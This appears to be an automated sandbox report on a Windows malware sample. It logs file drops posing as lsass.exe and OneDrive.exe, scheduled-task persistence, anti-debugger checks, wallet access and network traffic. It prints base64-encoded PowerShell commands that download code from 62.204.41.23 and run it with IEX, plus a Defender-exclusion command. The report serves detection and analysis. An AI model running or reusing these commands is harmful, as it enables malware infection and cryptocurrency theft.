NtAllocateVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000028d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 6, 2023, 11:59 a.m.	process_identifier: 2652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3e1f000 process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

dllhost.exe tried to sleep 251 seconds, actually delayed analysis time by 251 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW May 6, 2023, 12:07 p.m.	total_number_of_free_bytes: 13295779840 free_bytes_available: 13295779840 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\tmp8FE2.tmp.bat
file	C:\Users\test22\AppData\Roaming\dllhost.exe
file	C:\Users\test22\AppData\Roaming\lsass.exe
file	C:\Users\test22\AppData\Roaming\OneDrive.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
cmdline	"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
cmdline	"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
cmdline	"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
cmdline	"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Roaming\OneDrive.exe
file	C:\Users\test22\AppData\Roaming\dllhost.exe
file	C:\Users\test22\AppData\Roaming\lsass.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\dllhost.exe
file	C:\Users\test22\AppData\Roaming\lsass.exe

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW May 6, 2023, 11:58 a.m.	thread_identifier: 2656 thread_handle: 0x00000000000001d8 process_identifier: 2652 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001e4	1	1
CreateProcessInternalW May 6, 2023, 11:58 a.m.	thread_identifier: 2708 thread_handle: 0x00000000000001d8 process_identifier: 2704 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA== filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001f8	1	1
CreateProcessInternalW May 6, 2023, 11:58 a.m.	thread_identifier: 2760 thread_handle: 0x00000000000001d8 process_identifier: 2756 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA== filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001fc	1	1
CreateProcessInternalW May 6, 2023, 11:58 a.m.	thread_identifier: 2812 thread_handle: 0x00000000000001d8 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA== filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000204	1	1
CreateProcessInternalW May 6, 2023, 12:07 p.m.	thread_identifier: 2720 thread_handle: 0x000002f0 process_identifier: 1180 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000002f4	1	1
CreateProcessInternalW May 6, 2023, 12:07 p.m.	thread_identifier: 3036 thread_handle: 0x0000038c process_identifier: 1552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\tmp8FE2.tmp.bat" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003f4	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 6, 2023, 11:59 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (9 events)

Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:14:55 GMT Content-Type: image/png Content-Length: 162548 Last-Modified: Thu, 04 May 2023 00:12:30 GMT Connection: keep-alive ETag: "6452f86e-27af4" Expires: Sun, 07 May 2023 03:14:55 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:14:55 GMT Content-Type: image/png Content-Length: 4264 Last-Modified: Thu, 04 May 2023 02:58:19 GMT Connection: keep-alive ETag: "64531f4b-10a8" Expires: Sun, 07 May 2023 03:14:55 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:14:59 GMT Content-Type: image/png Content-Length: 10225664 Last-Modified: Thu, 04 May 2023 00:13:53 GMT Connection: keep-alive ETag: "6452f8c1-9c0800" Expires: Sun, 07 May 2023 03:14:59 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:15:13 GMT Content-Type: image/png Content-Length: 1707520 Last-Modified: Thu, 04 May 2023 00:13:53 GMT Connection: keep-alive ETag: "6452f8c1-1a0e00" Expires: Sun, 07 May 2023 03:15:13 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:15:18 GMT Content-Type: image/png Content-Length: 1771512 Last-Modified: Thu, 04 May 2023 04:24:37 GMT Connection: keep-alive ETag: "64533385-1b07f8" Expires: Sun, 07 May 2023 03:15:18 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
Data received	.com/ssl-cps-repository.htm0d+0VRAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference.0 `Hýl0Uÿ0ÿ0y+m0k0$+0http://ocsp.digicert.com0C+07http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0Uz0x0: 8 64http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0: 8 64http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0U+²íß¢¾W +gÍ0U#0Eë¢¯ôË1-Q§§!ómÈ0 H÷ FP>É·($§8¶[)¯RÏRé1G«V\{Õ A³ïìut8ò²\a¢ÃPä¹#Ñº:r8x¬u]4rGVÑë»6wÌ$¥óU©çãç«bÍû-ÂÀÒµ½^O±Ò=©[¦1b¨¨3ä9§ÄõÎxv%sä«ÏvKí_ÂKäKpLüÅy¼LWþ_á¼]¨þû8O Æ]¹gEÍÖíç ±iOûYà#Òª®\|îBÏ×'·îÃ½\| î,U"¸ëMü!I1GwqÜ±KKwÁO/Z)&1ý0ù00l10 UUS10U DigiCert Inc10Uwww.digicert.com1+0)U"DigiCert EV Code Signing CA (SHA2)F75õé4òYêñÊC0 + @0 H÷ 1 +70# H÷ 1>g©ØUö~ÀaÕæÔhY°ÿu0 H÷ £t:ôØÇp³´ÃìÓ¨³·ôsFà©ea+0±»0¢ãÃ¦µ@@§cî=>¿øã6\²8Óö H'²QÄ/¿nëµ »_ÂüdúÈ k°¯b}1-SFÎeAÎ!ÿs@Óâ3m$WIZ÷Æ\»¡ÆÚs½ÿoûÇ`òpÌSÚ427öh(Ø-»GRÔïà@uÅ¯\|< nå2Î5>þVv=w0;.ÊÒþXë%eK4µ"Â¢CõÚIM:&d?èÕe-v><OÇÛÍ¹qyõrSaÒ¡0 H÷ 1ü0ø0v0b10 UUS10U DigiCert Inc10Uwww.digicert.com1!0UDigiCert Assured ID CA-1:ÿX±kÖÕêæðf0 + ]0 H÷ 1 H÷ 0 H÷ 1 180829205938Z0# H÷ 1ÆÜ°Û íÇàÁ2+ºOûÖ¦PA0 H÷ AImkúdô:TÈ<v²u´ì« SÔ´nm57dï2Î^ÙníÓú¿9âêlj¸DÓÙÁ;EöÊrf/SíâÙÎ£¢Ô3ÖÉ~cÛnµÁ·cØzDwt\å¡îÝ½G,A»"pßÞ,M>ÎFöÆTéþ¶L7Ì»°âõ+ 2ãIExçÈÓø6D´e¹(1-Ô=Ýú¦(,µ} P;i°k yÈè j Ç×=\lGEp;§ËÈö'ïù.cyÁ°hük\|¬Vap}ù±×g¸Çz
Data received
Data received	F
Data received	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 06 May 2023 03:14:55 GMT Content-Type: image/png Content-Length: 462580 Last-Modified: Thu, 04 May 2023 01:24:48 GMT Connection: keep-alive ETag: "64530960-70ef4" Expires: Sun, 07 May 2023 03:14:55 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes

Poweshell is sending data to a remote host (8 events)

Data sent	GET /o.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive
Data sent	GET /file.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive
Data sent	GET /OneDrive.png HTTP/1.1 Host: 62.204.41.23
Data sent	GET /dllhost.png HTTP/1.1 Host: 62.204.41.23
Data sent	GET /lsass.png HTTP/1.1 Host: 62.204.41.23
Data sent	midUÄya¤óß+&Àl´³ ÊÌ[KÄÏÃX]»X/5 ÀÀÀ À 28(ÿ maper.info
Data sent	midUÄzË *ØÖÚ½ÀQXÁ>\1ø,3I©/5 ÀÀÀ À 28(ÿ maper.info
Data sent	GET /r.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 6, 2023, 11:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 6, 2023, 11:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 6, 2023, 11:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 6, 2023, 11:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 6, 2023, 12:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 6, 2023, 12:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f

One or more of the buffers contains an embedded PE file (3 events)

buffer	Buffer with sha1: 856e5b35dd227af96cb62742d474170217e6f96f
buffer	Buffer with sha1: 292c6139812045dfb52295988db6ed33c8d92af6
buffer	Buffer with sha1: e76bfd62ce8c231673166f2e0d3a66dda9fd3d03

Communicates with host for which no DNS query was performed (1 event)

host

62.204.41.23

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 95 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 6, 2023, 12:07 p.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive				reg_value	C:\ProgramData\lsass\lsass.exe
cmdline	"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (8 events)

Time & API	Arguments	Status	Return
send May 6, 2023, 11:59 a.m.	buffer: GET /o.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive socket: 1280 sent: 67	1	67
send May 6, 2023, 11:59 a.m.	buffer: GET /file.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive socket: 500 sent: 70	1	70
send May 6, 2023, 11:59 a.m.	buffer: GET /OneDrive.png HTTP/1.1 Host: 62.204.41.23 socket: 500 sent: 50	1	50
send May 6, 2023, 11:59 a.m.	buffer: GET /dllhost.png HTTP/1.1 Host: 62.204.41.23 socket: 500 sent: 49	1	49
send May 6, 2023, 11:59 a.m.	buffer: GET /lsass.png HTTP/1.1 Host: 62.204.41.23 socket: 500 sent: 47	1	47
send May 6, 2023, noon	buffer: midUÄya¤óß+&Àl´³ ÊÌ[KÄÏÃX]»X/5 ÀÀÀ À 28(ÿ maper.info socket: 1444 sent: 114	1	114
send May 6, 2023, noon	buffer: midUÄzË *ØÖÚ½ÀQXÁ>\1ø,3I©/5 ÀÀÀ À 28(ÿ maper.info socket: 1444 sent: 114	1	114
send May 6, 2023, 11:59 a.m.	buffer: GET /r.png HTTP/1.1 Host: 62.204.41.23 Connection: Keep-Alive socket: 1276 sent: 67	1	67

One or more non-whitelisted processes were created (6 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\OneDrive.exe
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\OneDrive.exe"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\dllhost.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\lsass.exe
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\lsass.exe"
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\dllhost.exe"

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (29 events)

Time & API	Arguments	Status	Return
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
